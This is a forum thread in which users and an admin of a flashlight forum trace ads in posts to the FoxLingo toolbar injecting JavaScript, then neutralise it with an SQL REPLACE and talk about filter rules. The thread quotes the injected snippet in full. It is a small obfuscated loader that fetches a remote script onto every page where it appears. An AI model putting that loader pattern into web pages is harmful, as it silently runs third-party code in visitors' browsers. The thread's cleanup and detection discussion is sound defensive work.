Ads on BLF???

You're right, my guess is it is a "virus" of some sort that is doing it since it is more than one person.

Edit: Sb beat me to it. ;) I'll throw out this link, where people were having trouble with foxlingo crashing things etc.

I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…

PPtk

Ref: #.appears after URL. And unknown script inserted | WordPress.org

FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)

Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.

I DON’T WANT IT!

Likely you guys are right on this one.

Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.

Could you please help me with a query in the comments table to replace all occurences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.

UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'

Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.

PPtk

Don’t Do It! Its not showing up correctly! Don’t Do what I Just said… Standby.

No worries, I didn’t run anything yet. What isn’t showing up correctly?

There is “stuff” after the word REPLACE that isn’t showing up…

Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form

And you’ll see it in the quote… Just grab it from there and run it.

Ah, I see. Nice catch. You can enclose code segments in @ marks like this so the filter system doesn’t modify it.

But your @ marks didn't show up there. ;)

Gotcha. I’m not use to Drupal. I tried enclosing it in [CODE] and [/CODE] tags, which didn’t work…
I updated the original post so that it’s correct for historical reference.

This board could use a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. :P

@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@

But @@ works.. kinda. Didnt quite work on the admins post scaru quoted.

To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.

Couldn't he just add something more specific like "script id=" so that java code wouldn't work, but people could still say the word javascript.

Yeah. I suppose. Who would want to say javascript (Bleh) though? :slight_smile:

In most cases, javascript is the problem, not the solution.

The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.

Oh, in that case (I use them to) maybe just block "foxlingo" to atleast stop these ads.

Looks like you did the update to example.com… How long did that update query take to run? How many records modified? Just curious…

Worked great, thanks! 25 records were modified.

So, after the two affected users are notified, I would like to remove the whole script. How can I do that with an SQL query? I’m sure many of those characters need to be escaped somehow. Here’s the original offending code: <script id="FoxLingoJs" type="text/javascript">// <![CDATA[!function(){try{var - Pastebin.com

Thanks a ton for the technical support PilotPTK!

My pleasure sb,

Removing the entire offending code is a little more complex. I’d have to see exactly how it looks in the actual SQL return.

If it’s pointing to example.com now, it’s really pretty harmless… I’m not sure I’d even waste the time cleaning up those 25 posts…

LMAO! Very disturbing indeed! :bigsmile: